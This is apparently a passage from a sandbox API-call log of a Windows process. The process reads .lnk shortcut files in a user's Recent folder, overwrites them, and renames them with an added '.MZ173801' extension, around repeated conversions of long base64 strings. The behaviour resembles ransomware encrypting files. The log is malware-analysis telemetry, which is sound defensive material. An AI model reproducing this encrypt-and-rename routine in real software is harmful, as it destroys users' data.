lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.706] GetCurrentThreadId () returned 0x1358 [0106.706] GetCurrentThreadId () returned 0x1358 [0106.706] GetCurrentThreadId () returned 0x1358 [0106.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.707] GetCurrentThreadId () returned 0x1358 [0106.707] GetCurrentThreadId () returned 0x1358 [0106.707] GetCurrentThreadId () returned 0x1358 [0106.707] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6E4Yux.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6e4yux.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.707] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.707] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.707] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x59c [0106.708] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.708] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x59c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x59c, lpOverlapped=0x0) returned 1 [0106.708] CloseHandle (hObject=0x3f4) returned 1 [0106.709] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6E4Yux.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6e4yux.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.709] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x59c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x59c, lpOverlapped=0x0) returned 1 [0106.710] CloseHandle (hObject=0x3f4) returned 1 [0106.711] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6E4Yux.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6e4yux.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6E4Yux.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6e4yux.lnk.mz173801")) returned 1 [0106.711] GetCurrentThreadId () returned 0x1358 [0106.711] GetCurrentThreadId () returned 0x1358 [0106.711] GetCurrentThreadId () returned 0x1358 [0106.711] GetCurrentThreadId () returned 0x1358 [0106.711] GetCurrentThreadId () returned 0x1358 [0106.711] GetCurrentThreadId () returned 0x1358 [0106.712] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea684180, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea684180, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea684180, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x339, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6ja7hKM dEHm7uKsn.lnk", cAlternateFileName="6JA7HK~1.LNK")) returned 1 [0106.712] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.712] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ja7hKM dEHm7uKsn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6ja7hkm dehm7uksn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea684180, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea684180, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea684180, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x339)) returned 1 [0106.712] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.712] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.712] GetCurrentThreadId () returned 0x1358 [0106.712] GetCurrentThreadId () returned 0x1358 [0106.712] GetCurrentThreadId () returned 0x1358 [0106.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.713] GetCurrentThreadId () returned 0x1358 [0106.713] GetCurrentThreadId () returned 0x1358 [0106.713] GetCurrentThreadId () returned 0x1358 [0106.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ja7hKM dEHm7uKsn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6ja7hkm dehm7uksn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.713] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.713] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.713] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x339 [0106.714] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.714] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x339, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x339, lpOverlapped=0x0) returned 1 [0106.714] CloseHandle (hObject=0x3f4) returned 1 [0106.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ja7hKM dEHm7uKsn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6ja7hkm dehm7uksn.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.715] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x339, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x339, 